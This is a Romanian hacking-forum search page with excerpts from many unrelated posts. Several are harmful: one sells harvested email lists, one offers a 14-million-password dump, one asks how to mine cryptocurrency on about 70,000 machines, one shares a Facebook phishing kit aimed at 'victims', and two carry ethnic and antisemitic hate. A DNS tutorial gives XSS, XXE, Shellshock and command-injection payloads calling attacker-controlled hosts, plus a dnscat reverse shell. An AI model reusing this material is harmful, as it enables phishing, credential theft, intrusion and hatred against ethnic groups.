Jump to content

Search the Community

Showing results for tags 'mai'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Cisco Connect 2015 Mai vine careva?
  2. 'Facebook Purge' Will Delete All Fake/Bought Page Likes - News - Deep House Amsterdam de pe 12 aveam o pagina cu vreo 5k de likeuri toate cam aduse de pe addmefast, in 5 zile a ajuns la 600 de likeuri si tot mai scade Ce stiti despre asta? Ce metode mai folositi pentru likeuri caci addmefast-ul nu mai merge. edit: https://www.facebook.com/business/news/page-likes-update
  3. Ca sa mai rotunjesc veniturile si ca tot tin calculatorul aprins 24/24 am zis sa trag ceva mail-uri sa le pun la vanzare, macar sa platesc factura la curent Pentru o perioada am doar mail-uri de: Italia, Belgia, Uk, Germania, Spania, Franta, mai am si 10MB de mail-uri .com Daca esti "parvenit" pe aici nu te obosii sa imi dai add ca nu fac nici-un targ cu tine! Pretul il negociem in functie de comanda, cat sa fie in avantajul amandurora. Ma puteti contacta prin PM sau ICQ: 650624526
  4. Bill Gates a fost numarul UNU mondial in topul Forbes al celor mai bogati oameni ai lumii de mai multe ori (cam de 17 cica). Era depasit de Slim Selu ala cu telecomunicatiile si el in loc sa se lupte si-a facut fundatia aia si a donat si inca doneaza in fiecare an MILIARDE de dolari. A ajutat si inca ajuta milioane si zeci de milioane de oameni in toata lumea. A finantat diverse proiecte pentru a face rost de apa in zonele desertice, pentru lupta impotriva Ebola si asa mai departe. Multi oameni, printre care chiar si eu, au crezut ca nu va mai fi in numarul unu mondial niciodata, mai ales ca a inceput sa "futa" banii pe ce am zis mai sus in loc sa-i investeasca in ceva ce-i aduce profit. Eu credeam, mai ales cand a zis ca renunta la functiile cheie din cardul Microsoft, ca s-a dilit si nu-l mai intereseaza banii. De fapt, la atatia bani probabil ca gandesti altfel. Sa fim seriosi, sunt destule cazuri in care au luat-o razna ca au castigat cateva milioane la loto, pai asta are miliarde, zeci de miliarde... e cam greu sa rezisti si sa fii si sanatos la cap. Ca sa va faceti o idee: Cat doneaza el in fiecare an si cat produce el in fiecare secunda (fie ca face ceva sau fie ca doarme) : Si un articol despre el: World’s richest man BILL GATES! Posted on February 16, 2015 by Arash World’s richest man BILL GATES Bill Gates has founded the biggest software company in the world, he has been the world’s richest person for many years, everyone believes he is one of the greatest businessmen in the world, and they think he is a perfect man, but even Bill Gates, has some weak points too. Based on the report by Live science, according to Beach-News; in forum in the Reddit website, he has answered to many questions from random people around the world. One of the questioners asked Bill Gates what something he regrets doing is or not doing in his life, Bill Gates answered: “I am ashamed of not knowing any other foreign language. In high school, I studied Greek and Latin, and learned a lot of vocabulary, but I always wanted to learn French and Chinese too. I always hoped I could learn French and I could have enough time for this.” Also Gates has said, he has used online websites for learning other languages but he never continued. He also adored Mark Zuckerberg, Facebook founder for his ability in speaking Chinese that he can answer questions from Chinese students. Bill Gates, Originally William Henry Bill Gates, is an American businessman, Investor, Computer Programmer and Inventor. Gates is best known as Co-Founder of Microsoft, his company is the largest software company in the world. Bill Gates has authored several books. He is the richest man in the world, since 2009 until 2014, his wealth doubled from 40 billion dollars to 82 billion dollars. According to Forbes, his net wealth is 81 billion dollars at the moment. Sursa: World’s richest man BILL GATES! Numarul unu mondial, DIN NOU, desi a donat si inca doneaza o gramada de bani: https://www.youtube.com/watch?v=ERHlsyfkZEM Am deschis acest topic fiindca nu credeam ca va mai fi iarasi numarul unu, pentru mine e o supriza si ma bucura acest fapt ! Nu imi plateste el intretinerea si nici nu-mi da el de mancare dar pot sa va zic ca Steve Jobs nu se compara nici pe departe cu Bill Gates care mi se pare un geniu, un tip inovator si un om care vrea sa ajute omenirea nu cum a stat ala cu banul la ciorap ! Atat am avut de zis !
  5. 14 million pass Am mai vazut ca s-au mai postat parole si v-am dat si eu un pack.
  6. Industria securit??ii cibernetice s-a dezvoltat vertiginos în ultimii ani, îns? cea mai mare provocare pentru acest domeniu r?mâne recrutarea noilor talente, în condi?iile unui deficit tot mai mare de speciali?ti, scrie agen?ia UPI, potrivit Agerpres Este aproape imposibil s? angajezi oameni cu experien?? în acest domeniu, consider? Alex Stamos, expert în securitate cibernetic? în cadrul companiei Yahoo. Potrivit acestuia, în Statele Unite nu sunt decât patru sau cinci mii de astfel de speciali?ti. Problema deficitului de personal se agraveaz? pe m?sur? ce cre?te num?rul atacurilor cibernetice. Un studiu recent realizat de Institutul Ponemon ?i finan?at de IBM a ar?tat c? aproape jum?tate din americanii adul?i — 110 milioane — au fost victime ale hackerilor în 2014. Biroul pentru Statistica Pie?ei Muncii din SUA a estimat c?, în perioada 2012-2022, cererea de speciali?ti în securitate cibernetic? va cre?te cu 37%, iar în urm?torii ?apte ani vor fi disponibile peste 100.000 de locuri de munc? în acest domeniu. Originea : Sursa // Edit: - Pai la ce prosti sunt, nu ma mir. Noroc ca au cerut serviciile de la hackerone. XSS-ul de l-am gasit, mi-a spus cineva ca a fost patched. Ce poti sa mai le zici la ratatii astia? Experti? HAHAHAH Buna asta!!! Daca si behrouz cu acunetixu gaseste la ei sqli, nu mai zic nimic. Mai nou la spamagii le zic hackeri.. frumos domnle . MUIE YAHOO SI PAYPAL . punct
  7. Salut. Sa zicem ca am o retea de calculatoare, ~70k la numar, cu procesoare ok,i3-i5,chiar si i7, placile video nu le stiu si pot instala un bitcoin/cryptocurrency miner. Care ar fi cel mai bun de minat? Si sa il pot mina in pool(sa mineze in contul meu,daca nu m-am exprimat corect). Daca puteti sa imi dati si siteul de pool + un program / github ceva,as fi recunoscator. Servus.
  8. To?i cei care doresc s? câ?tige Bitcoin gratuit de zi cu zi . Trebuie doar sa va inregistrati pe link-ul de mai jos. Este metod? u?oar? ?i testat? (nu de mine) . Sistem la nivel refferal . https://qoinpro.com/bf2708ebb5a4917f4bbfb4050e113394
  9. 1. Se taie orice fel de aloca?ie/subven?ie pentru copilul tigan care nu merge la ?coal?. Se taie ?i pentru fra?ii lui mai mici care nu au înc? vârsta de mers la ?coal?. Dac? unul din ei cre?te ?i merge la ?coal? acela prime?te aloca?ia ?i din urm?, minus cât a primit fratele mai mare aiurea. 2. Orice mam? tiganca este prins? la cer?it cu sugarul în bra?e (de multe ori adormit cu alcool) r?mâne f?r? el, bebelul intr? în sistemul de stat ca orfan ?i ea în pu?c?rie. F?r? discu?ii. 3. Orice copil tigan sub 16 ani este prins la cer?it de mai mult de dou? ori este preluat de sistemul de stat. F?r? discu?ii. 4. Orice tigan peste 16 ani este prins la cer?it mai mult de dou? ori intr? la mititica pentru o lun?. Dac? recidiveaz? termenul cre?te. 5. Orice tigan nu-?i pl?te?te impozitele pe proprietate sau nu are cum explica provenien?a propriet??ii este executat silit pentru impozite ?i i se confisc? venitul neexplicat. F?r? discu?ii. 6. Orice grup de tigani într? cu scandal într-o institu?ie a statului, c? e vorba de spital, tribunal sau sec?ie de mili?ie, intr? o lun? la r?coare. Dac? a f?cut mai mult decât scandal, termenul cre?te. 7. Orice ?atr?/colectivitate de tigani este prins? la furt organizat este b?gat? la mititica ?i copiii trimi?i în sistemul de stat. 8. Orice pirand? este prins? ridicându-?i fusta în public, cu inten?ii agresive, este sp?lat? cu gaz în zona scoas? la înaintare pentru diminuarea pericolului social. 9. Se revine la cuvântul oficial ?igan. Rom a ajuns s? aib? exact aceea?i conota?ie negativ? tr?gând-o în schimb ?i peste cuvântul român. 10. Toate m?surile de mai sus se aplic? pentru oricare alt cet??ean al României, indiferent de etnie. Norme metodologice: 1. Dup? cum vede?i cei zece pa?i se refer? doar la elementele negative ale societ??ii în nici într-un caz la milioanele ?i milioanele de ?igani respectabili de forma – am cunoscut romi mai de treab?, mai cinsti?i, mai sp?la?i decât românii. ?sta pe care l-a cunoscut toat? lumea e deja integrat ?i scutit de cei zece pa?i. 2. Închisorile ce vor acoperi cererea de cazare nu vor fi de tipul – avem nevoie de 500-600 de euro pe lun? pentru un de?inut – ci de genul – nu munce?ti m?nânci m?m?lig? cu ap? zilnic, 12-13 caza?i în camer?, igiena ?i deratizarea e treaba oaspe?ilor nu a altcuiva. 3. F?r? discu?ii. Articol de Ghita Traian - Reactii.ro Nationalisti.ro — National - Social - Radical @hate.me sari rpd cu ``infractiunea`` pe mine.
  10. andrei98M

    chat

    Viata mea nu mai e asa porno de cand nu mai exista chat.Nu mai stiu cand Gecko mananca pizza , oare de ce?Nu pot stii cand cmed iese in oras cu fetite de 12 ani....Nu stiu cand aerosol e high .....pff...acum nu stiu cand wtf va avea motocicleta?!De ceeee Acum serios , va rog deschideti chatul ala
  11. https://rstforums.com/forum/98224-cumpar-cont-steam-cu-cs-1-6-cs.rst I-am trimis un gift cs pack pe steam si a zis ca imi da 10 euro.Si acum mai astept banii de la el. Mai zice ca lucreaza si ca programator si nu are 50 lei sa imi dea pe un steam.Sau 100 lei sa isi cumpere singur. ))) E teapa asta e.Aveti grija cu el.Nu dati inainte.E un copil frustrat de pe vreun server de counter acum il las sa se bucure si el de un steam.Daca vede Thread asta sa imi dea pm sa ii mai dau un gift. @betivuu'
  12. Azi o sa va arat cum puteti alfa parola de la Facebook. In aceasta arhiva aveti cele necesare Parola arhivei: fb-2015 Tot ce mai aveti voi de facut este sa le incarcati pe un site de host (recomand Hostinger si sa trimiteti "victimelor" link-ul. username si password celor catiau cazut in plasa o sati apara pe site-ul facut de tine intr-un fiser text numit log.txt Nu este facut de mine nu am nici cea mai mica contributie la aceasta metoda. Doar v-am spus si voua de ea. Cine n-a inteles sau vrea mai multe detali sa lase un comentariu.
  13. Mai face cineva un chat ? )
  14. Salut rst mi-a zis un prieten cum pot face si eu 5$ pe zi , stau doar 3-4 ore maxim sa fac atat , daca stati mai mult puteti face si mai mult. Este un site unde pot da like-uri la pagini pe facebook, la comentarii, google +1, vizionari pe yt si multe altele. Acesta este site cu ref meu: Free Facebook Likes - Facebook Like Exchange - Like4.us si fara ref Home - Like4.us . Eu am transferat ieri 5 euro facuti !
  15. Buna ziua la toti,stiu ca nu am multe posturi,dar vreau sa trec direct la subiect pentru ca deja chiar nu mai suport Am cumparat de la un prieten un iphone 5 alb,frumos,doar ca iphone-ul e codat pe o retea din irlanda,adica hutchison o2. Am fost la gsm cu el sa vad cat face decodatul,l-am dus si mi-a spus ca nu e foarte mult,e vorba de 200 lei Ok,am acceptat sa il decodez,inainte sa il duc la decodat l-am si verificat sa vad daca e backlisted,m-a costat 20 lei dar nu e backlisted nu e furat,nu e raportat.e curat L-am dus la decodat si mi-au spus ca trebuie sa astept intre 2-10 zile,asta este a 12 zi si eu inca nu am iphone-ul la mine...plus ca nu e nici decodat,am fost la gsm de mai multe ori sa vad cum sta situatia..chiar astazi am fost si mi-au spus ca au dat ceva notificare ca sa le raspunda mai repede in legatura cu decodarea.dar inca nu au primit nici un raspuns.. Eu cred ca nu mi-am luat teapa...adica totusi e GSM... Mentionez ca iphone-ul nu mai are garantie demult,si cand l-am dus la decodat telefonul trebuia activat.. Ceva sfaturi si pentru mine,chiar nu mai pot...
  16. Salut, as vrea sa.mi fac un cont online cu care sa platesc diferite facturi, comenzi etc.. dar as dori sa.mi spune.ti o "firma" care are cele mai mici taxe.. pana acm am auzit de paypal 2 euro ptr retragere si 0 ptr depozit daca nu ma insel.. as dori unul fara taxe sau mai mici daca exista.. lasa.ti aici un link si argumente ptr fiecare. Multumesc ! P.s sau macar sa aiba o retragere gratuita pe luna.. sau in genu..
  17. Salut tuturor celor din rst eu folosesc in prezent un avast free edition si ma gandeam sa fac schimbarea cu bitefender free edition dar ma paste gandurile ca avast ar fi mai bun as vrea si eu sa stiu care sunt optiuniile voastre si de ce .
  18. Salut baieti. AM si eu nevoie de 14 $ btc. Ofer cod de reincarcare paypal..amazon......cam ce aveti nevoie si pot sa obtin cu bani cash. Puteti sa lasati mai jos mesaj sau PM cine nu doreste sa se afiseze. Multumesc frumos. EDIT: Am fost contactat de mai multi membri. Tranzactia a fost incheiata cu succes. Toti ce au trimis PM vor fi contactati pentru colaborari viitoare. Multumesc frumos. Admin se poate inchide threadul si trash.
  19. Dau 50 de lei pt cat mai multe like-uri reale.Astept oferte.
  20. vand 2 domenii cumparate de cateva luni 3 sau 4 de la godaddy. Mai multe detalii in PM!
  21. Caut pe cineva care se pricepe la PHP - HTML ! PM pentru a vorbi mai multe !
  22. Copiii-bufni?? ai erei digitale, genera?ia care nu mai doarme noaptea. Ce urm?ri are obiceiul lor Mereu conecta?i la tablete ?i telefoane, copiii ?i adolescen?ii de ast?zi abia dac? mai prind câteva ore de somn pe noapte, comportament care vine „la pachet“ cu multe probleme de s?n?tate ?i cu rezultate ?colare slabe. Dependen?a de noile tehnologii este mai puternic? decât oricând, iar fetele sunt mai vulnerabile, spun psihologii. Genera?ia de copii ?i de adolescen?i de ast?zi doarme cele mai pu?ine ore pe noapte, iar motivul este c? nu se pot desprinde de telefoane ?i tablete. „Copiii-bufni??“, cum a fost numi?i de psihologi tinerii conecta?i la tehnologii pân? târziu în noapte, prind, în medie, ?apte ore ?i jum?tate de somn, în condi?iile în care la vârsta lor au nevoie de opt-zece ore de somn pe noapte, aten?ioneaz? speciali?tii. Noile tehnologii au dat peste cap mai mult decât oricând programul de somn al tinerilor. Ei au acces acum la re?ele de socializare ?i la jocuri la orice or? din zi ?i din noapte. În România, 8 din 10 copii au cont pe o re?ea de socializare, de?i accesul le este, teoretic interzis, potrivit unui studiu. Mai mult, copiii din ?ara noastr? se num?r? printre cei care primesc cel mai devreme un telefon mobil: media de vârst? este de 9 ani, arat? statisticile. În 2014, 26% din copiii români de?ineau un smartphone, iar 10% aveau o tablet?. Lucrurile nu sunt cu mult diferite nici în rândul adolescen?ilor. Ei au chiar mai multe gadgeturi decât angaja?ii sau antreprenorii, ar?ta un studiu realizat de Mercury Research la sfâr?itul anului 2013. “În ultimul timp, copiii care au un program dezordonat din cauza folosirii tabletei sau telefonului sunt din ce în ce mai numero?i. De asemenea, vârsta la care copilul începe s? nu mai respecte un orar prestabilit, s? încalce orele de somn ?i disciplina orelor de studiu ?i joac? începe s? scad? alarmant.” Keren Rosner, psiholog din Bucure?ti Adolescen?ii-vampir care nu dorm niciodat? Nu mai pu?in de 65% din copiii din ziua de azi dorm mai pu?in decât ar trebui, iar mul?i dintre ace?tia au ajuns s? sufere de insomnii, potrivit unui studiu realizat de Sleep Foundation, din Marea Britanie. Pân? ajung la vârsta adolescen?ei, obiceiul acestor copii devine atât de obi?nuit, încât au primit propriul nume: „vampiri“, dup? modelul adolescen?ilor-vampiri care nu dorm niciodat? din pelicula ?i cartea „Amurg“ (engl. – „Twilight“). Adriana S. (49 de ani), din Bucure?ti, este una dintre mamele care simt c? nu mai au niciun control asupra programului de somn al adolescen?ilor lor. Deseori, ea î?i surprinde fiul, Tiberiu (14 ani) înc? treaz la ore târzii din noapte ?i nicio metod? pe care ea a încercat-o nu l-au convins pe adolescent s? mearg? mai devreme la culcare. „Am încercat cu amenin??ri, cu recompense, i-am luat ?i telefonul o s?pt?mân?, dar de fiecare dat? revine la programul lui de «pas?re de noapte» ?i simt c? nu mai pot face nimic în sensul acesta. De câ?iva ani, între noi este un r?zboi tocmai din aceast? cauz? ?i cred c? a devenit o b?t?lie pierdurt? pentru mine. Îmi pare r?u c? i-am luat telefon ?i tablet?, dar nu cred c? a? fi avut o via?? mai lini?tit? cu el dac? a? fi refuzat, în condi?iile în care to?i ceilal?i copii de vârsta lui au a?a ceva“, se plânge Adriana. Fetele sunt chiar mai vulnerabile decât b?ie?ii în fa?a noilor tehnologii, pentru c? nevoia lor de a sta conectate la Facebook, Instagram ?i la alte re?ele este compulsiv?, spun speciali?tii. Pentru tineri, statul pân? la ore târzii este chiar un obicei „cool“, cu care se laud? pe re?elele de socializare. La o simpl? c?utare, vom g?si nenum?rate selfie-uri cu ei în camere semi-întunecate, având ochii ro?ii de la lipsa de somn, dar l?udându-se c? nu dorm toat? noaptea. Danah Boyd, un sociolog britanic ?i autoarea unei c?r?i despre adolescen?i ?i dependen?a de internet, crede c? ace?ti tineri prefer? s? sufere de oboseal? cronic? decât s? renun?e la „timpul lor“ de peste noapte. Acestea sunt singurele momente din zi pe care adolescen?ii le consider? intime ?i în care pot purta conversa?ii feri?i de privirile curioase ?i critice ale adul?ilor. Cu ce riscuri vine „la pachet“ somnul pu?in Somnul pu?in î?i las? amprenta asupra s?n?t??ii, comportamentului ?i performan?elor ?colare ale copiilor ?i adolescen?ilor. Creierul lor nu este pe deplin format la aceste vârste ?i „au nevoie de somn odihnitor ?i suficient pentru a se dezvolta armonios din punct de vedere fizic ?i psihic. Somnul din prima etapa a nop?ii, pân? la ora 12.00, este considerat cel mai benefic pentru creier. Când copilul se priveaz? frecvent de acest remediu, calitatea vie?ii lui va avea de suferit pe termen scurt, dar ?i pe viitor“, mai spune psihologul Keren Rosner. Lipsa de somn vine „la pachet” cu un risc mai mare de depresie ?i de suicid, potrivit unui studiu realizat de Columbia University Medical Center din New York, în rândul a peste 15.000 de tineri cu vârste cuprinse între 12 ?i 18 ani. De asemenea, num?rul mai mic de ore de somn predispune la obezitate, iar adolescen?ii care nu dorm suficient sunt mai furio?i ?i mai recalcitran?i cu p?rin?ii ?i cadrele didactice. În plus, „li se va aplatiza voin?a, nu va mai sim?i bucuria de a face lucruri specifice vârstei ?i se va izola“, atrage aten?ia psihologul. ?i performan?ele ?colare ale copiilor ?i adolescen?ilor au de suferit, pentru c? lipsa de somn afecteaz? memoria ?i concentrarea în timpul zilei. „Sunt convins? s? fiul meu ar putea fi mai mult decât mediocru la ?coal? dac? s-ar odihni mai mult“, crede Adriana, mama adolescentului Tiberiu, din Bucure?ti. Ce pot face p?rin?ii Adul?ii nu pot sta nep?s?tori în fa?a un astfel de comportament care afecteaz? via?a copiilor, dar implicarea lor este o problem? delicat?. „Trebuie s? se implice mai ferm pentru a le ordona via?a, dar nu într-un mod tiranic, nici agresiv, ci prietene?te ?i implicat activ. Decât s? se ajung? la dependen??, mai eficient este ca p?rintele s?-?i supravegheze copilul ?i s? nu permit? s? se ajung? la un asemenea punct critic. Nu este un semn bun când copilul este lini?tit ?i nu te deranjeaz?, fiindc? st? ore în ?ir izolat în camera lui, cu tableta. Iar??i, nu este o solu?ie ca p?rintele doar s? se plâng? de faptul c? nu ?tie cum s? ac?ioneze, eventual doar s? îl certe pe copil ?i s? nu intervin? când copilul st? pân? spre diminea?? la calculator. El ar trebui s?-i ofere alternative copilului, nu doar s?-i interzic? s? petreac? mult timp cu calculatorul sau telefonul“, recomand? psihologul Keren Rosner, care mai puncteaz? s? p?rintele ar trebui s? fie un exemplu pentru copil ?i s? aib? un comportament în concordan?? cu discursul s?u. Autor: Oana Antonescu Sursa: Adevarul.ro
  23. Domeniu Nume Sistem ( DNS ), este unul din instrumentele pe care le folosim foarte des pentru a naviga pe internet, acesta fiind folosit pentru a transforma o adresa WEB sau un HOSTNAME cu formatul www.numesite.com.it.ro.net.ecc intr-o adresa IP cu formatul numeric nnn.nnn.nnn.nnn . Cum o sa vedem in continuare, DNS-urile au mult mai multe functii, iar scopul acestui tutorial este acela de a vedea, cum putem efectua ENUMERARI DI DESCOPERIRI, adica cum sa citim adresele IP asociate unui domeniu si sa descoperim sub-domeniile conectate acestuia . Tipuri de DNS Inainte de a incepe cu practica, este necesar sa clarificam, care sunt principalele tipuri de DNS si campul lor de utilitate Tip de DNS || Descriere A || Transofrma un HOSTNAME intr-o adresa IPv4 AAAA || Transforma un HOSTNAME intr-o adresa IPv6 CNAME || Transforma un HOSTNAME intr-un alt HOSTNAME MX || Ne da adresa de E-mail Exchange folosita pentru trimiterea de e-mail NS || Ne da adresa NAMESERVER folosita pentru gestionarea "recordDNS" TXT || Ne ofera un sir ( string ) SRV || Service Record, folosit pentru a specifica un tip de serviciu, poate contine HOSTNAME-ul si PORT-ul pe care serviuciu lucreaza, foarte des folosit pentru VoIP PTR || Pointer Record, folosit pentru a obtine un HOSTNAME pe IP Pe pagina de Wikipedia, este disponibila lista completa tuturor tipurilor de DNS record . Enumerare si descoperire Tool-ul care ne permite sa facem chemari de tip DNS ( request ) este dig . Sa vedem cum putem sa chemam tipul de DNS " A " al domeniului HTML.it, folosind serverul DNS google ( 8.8.8.8 ) : dig @8.8.8.8 -t A html.it Dar daca vom vrea sa obtinem toate topurile de DNS record, fara sa specificam ce vrem pas cu pas, vom folosii : dig @8.8.8.8 -t ANY html.it Informatiile primite de la dig, pot fii prea putine si incomplete, putem insa sa obtinem mai multe informatii folosind dnsdict6 . dnsdict6 -4 -d -S html.it Comenzile precendente : Paramentrul " -4 ", efectueaza enumerarea si pe protocolul IPv4 Paramentrul " -d ", ne arata informatii si indrumari IPv6 Paramentrul " -S ", cere efectuarea enumerari pe tipul de DNS SRV dnsdict6 contine default un dictionar de aproximativ 1500 de cuvinte cheie, care sunt utilizate ( cum se vede in iesire precendenta ( output )), pentru a gasii domenii de nivelul 3 ( numite sub-domenii ) . Este posibil daca vrem sa specificam un dictionar extern . dnsdict6 -4 -d -S html.it /home/simone/dizionari/dns_presonal.txt Acum ca am obtinut o lista mai mult sau mai putin completa de sub-domenii putem sa trecem la folosire de " dnsenum ", o comanda care in afara ca probeaza din dictionar cuvintele cheie, efectueaza o cautare direct pe Google, pentru a ne da rezultate mult mai exacte . dnsenum --dnsserver 8.8.8.8 --enum html.it Comenzile precendente : Parametrul " -dnsserver ", specifica pe care server sa mergem si sa efectual request-urile Parametrul " -enum ", porneste varie tipuri de enumerare, dintre care, dictionar, cautare Google si rezultate Whols . Pe langa toate astea, este posibil sa obtinem o lista cu sub-domenii cu ajutorul Google ( excluzand rezultatele care contin WWW, utilizand stringul ca in exemplu : site:html.it -www Incest puct in care suntem ajunsi avem mult mai multe informatii despre domeniul pe care il analizam . Putem strange acum cuvintele cheie pe care le-am folosit, pentru a proteja domeniul de atacurile de tip " Man-in-the-Middle" sau transferuri frauduloase . Acest sistem de protejare se numeste DNSSEC . dnsrecon -d verisigninc.com Paramentrul " -d ", ne permite sa specificam domeniul asupra caruia vrem sa efectual enumerarea . Acum, avem destule informatii pentru a face descoperirea ( discovery ) : este vorba de procesul de cautare prin adresele IP ( vecine ), cautand alte nume DNS, care pot face referire la tinta noastra ( target ) . dnsrecon -r 151.1.244.200/24 Parametrul " -r ", efectueaza un " Reverse Lookup " . Range-ul ( Gama ), este specificata cu un netmask, este request-ul care este trimis serverului DNS de tip PTR . Pentru a face reversing adreselor IPv6, putem folosii dnsrevenum6 : dnsrevenum6 8.8.8.8 2001:41d0:1:ad64:1::/48 In precedenta comanda, primul parametru este adressa serverului DNS ( in acest caz Google ) si al doilea parametru este range-ul, specificat cu netmask /48, al adresei IPv6 . Toate informatiile adunate, provin din servicii publice, deci sunt consultabile de oricine, nu am facut nici o ilegalitate pe durata procesului de enumerare si descoperire . DNS : Functionarea si verificarea acestuia de vulnerabilitati Parcursul unui request DNS . Imaginea de mai sus, a fost selectata din prezentarea tinuta de Ron Bowes ( angajat Google ), tinuta la DerbyCon 2014, unde explica exact cum functioneaza un request DNS . Primul dispozitiv pe care il vom interoga va fii router-ul nostru . In cazul in care nu s-au facut request-uri pana acum, request-ul va ajunge la serverul DNS configurat in internul router-ului . Daca nici Google nu este abil pentru a rezolva adresa, va face intrebari root-serverelor (servere care sunt responsabile pentru fiecare domeniu de nivel 1 in parte ) . Daca nici aceste ultime masuri nu gasesc raspunsul, vor face un tur de request-uri la autohoritative server, care este un server DNS sub controlul nostru . In acest mod vom putea raspunde originalului request DNS cu valoarea aleasa de noi . Trebuie sa stim sa serviciul DNS este lasat deschis in majoritatea parilor de server, daca nu ar fi asa, nu ar mai exista posibilitatea ca serverul sa comunice cu toti la nivel global . Acesta ne permite sa comunicam cu serverul, reusind sa trecem peste eventuali Firewall sau Intrusion Prevention System ( IPS ) . Noi metode de atac folosind DNS-uri, verificarea de vulnerabilitati Intr-un assessment in blackbox este greu sa intelegem cum datele vin in internul sistemului . Cu ajutorul DNS-ului putem sa urmarim sau cel putin sa intelegem daca datele noastre sunt acceptate de terzi . Cross-Site Scripting ( XSS ) In perioada 2010 si 2012 au fost efectuate teste pe trei mari portale de Whols surprinzand, ele fiind vulnerabile atacurilor XSS, atacatorul crease un record DNS de tip TXT cu un cod similiar acestuia . <script src="http://siteulnostru/evil.js"></script> Folosind alte tipuri de DNS, cum ar fi, CNAME, MX sau PTR, ar fi fost mult mai greu, vazand ca tipurile de record precedente nu permit folosirea de spatii sau ghilimele ca in exemplu . <script/src='http://siteulnostru/evil.js"></script> Atacatorul a reusit sa injecteze un cod malitios permanent, care putea afecta orice vizitator . SQL injection Exista multe functii PHP sau ASP, care permit sa preluam valoarea unui record DNS . Aceste date pot fii folosite in continuare si utilizate intr-un query SQL fara a fi filtrat . Sa vedem cum putem exploata acest tip de vulnerabilitate, folosindune de un exemplu dat de Ron Bowse facut in PHP . Atacatorul are posibilitatea de a modifica query-ul SQL, obtinand parola unui alt user, utilizand un record DNS de tip TXT ca in exemplu . Acesta fiind un singur exemplu unde utilizatorul stie codul sursa al aplicatiei . Intr-un caz real este greu sa afli adevaratul query SQL daca nu stii cum a fost scris . XML External Entity ( XXE ) Putem verifica daca un sistem este vulnerabil XXE introducand in internul fisierului sau a query XML, un cod ca cel ce urmeaza : ]<!ENTITY xxe SYSTEM "http://notexistingname.ourserver.org" >]> <user>&xxe;</user> Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " notexistingname ", vom stii ca sistemul este vulnerabil actiunilor externe . In acest punct ajunsi putem sa incepem sa adunam fisiere locale, cum ar fii /etc/passwd . ShellShock Una dintre metodele de invazie pentru a verifica prezenta unui bug Bash ( ShellShock ), este folosirea rezolutiei DNS cu ajutorul nslookup, comanda recunoscuta pe Windows, Linux si Mac . Se poate imposta un user-agent si sa asteptam ca vin request-urile . () { test;};nslookup shellshocked.ourserver.org Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " shellshocked ", vom sti ca aplicatia web foloseste un script cu o versiune vulnerabila de Bash . Putem deci sa executam orice alta comanda in locul simplei nslookup . Remote command execution ( RCE ) Ca in exemplul de Shellshock putem executa nslookup, pentru a verifica vulnerabilitatile de tip RCE, pentru a face asta sunt o gama larga de trucuri ca in exemplu : ;nslookup shell.ourserver.org `nslookup shell.ourserver.org` |nslookup shell.ourserver.org $(nslookup shell.ourserver.org) Ca in exemplele precedente, cand vom primi un request de rezolutie pentru " shell ", va insemna ca am verificat vulnerabilitatea si putem incepe atacul . DNS : Atac post-verificare Noi metode de atac folosind DNS-uri, post-verificare Dupa ce am verificat ca unul dintre atacurile precendent a functionat, putem in continuare sa folosim serviciul DNS pentru a mentine un profil low fara a face prea mult " zgomot " pe reteaua tintei noastre . Vom aveam nevoie de un tool numit dnscat, prezent in internul nbtool, poate fii obtinul prin GitHub . dnscat --listen -p 53 Comanda precedenta : " -listen ", deschide dnscat in modul server ( ascultare ) " -p ", identifica port-ul pe care va face " listening " . 53 fiind default, acela al serviciului DNS Acum putem sa deschidem pe masina tintei, dnscat ca si client, care va reintoarce ca shell de comenzi de windows ( cmd.exe ) . dnscat --dns virtualmachine1 -e cmd.exe Aici : " -dns ", identifica IP-ul sau hostname-ul masinii pe care este pornit dnscat in modalitatea server. " -exec ", porneste promp-ul de comnezi windows Iar acesta in schimb este vizualul serverului . Tot ce este scris si citit de dnscat, trece prin queryDNS, asa cum putem vedea explorand cu Wireshark : Concluzii Am vazut cum sa folosim si sa abuzam de un serviciu care a existat mereu inca din primi ani '80 si pe care tot internetul se bazeaza . Tutorialul ne arata cum este posibil sa obtinem informatii facand query-uri de tip DNS si expoatarea unui canal de comunicare greu filtrat . Multe metode de recunoastere si atac prezente in acet tutorial sunt ramificate din prezentarea lui Ron Bowse . Videoul urmator, este o demonstratie de atac XSS majoritatii site-urilor Whols . Sursa
  24. O sa revin cu reteaua de socializare pt amatorii de informatica pe plan international. Inca o o idee - o retea de socializare romaneasca pt angajatori/doritori de joburi (in folosoul omului de rand). Rog si alte persoane sa vina cu idei noi pe care alte natii idioate nu le au. Retineti ca un jidan idiot a facut Facebookul. O alta idee: Avand i nvedere ca noua lege big bro o sa fie aprobata, o sa fie stire de maxima audienta. Hai sa protejam si sa profitam pe treaba asta. Cu siguranta aici sunt multi oameni cu experienta ce pot combate monitorizarea si sa dezvolte ceva publicului larg...ceva criptat prin intermediul retelelor expuse mai sus. Noi putem mai mult, sunt sigur. Dou?sprezece voci urlau furioase ?i toate erau la fel. Ce se petrecuse cu fe?ele porcilor nu mai era de-acum o dilem?. Fiin?ele de afar? privir? de la porc la om ?i de la om la porc ?i din nou de la porc la om: deja era imposibil s? mai spui care era care. - G. Orwell
×
×
  • Create New...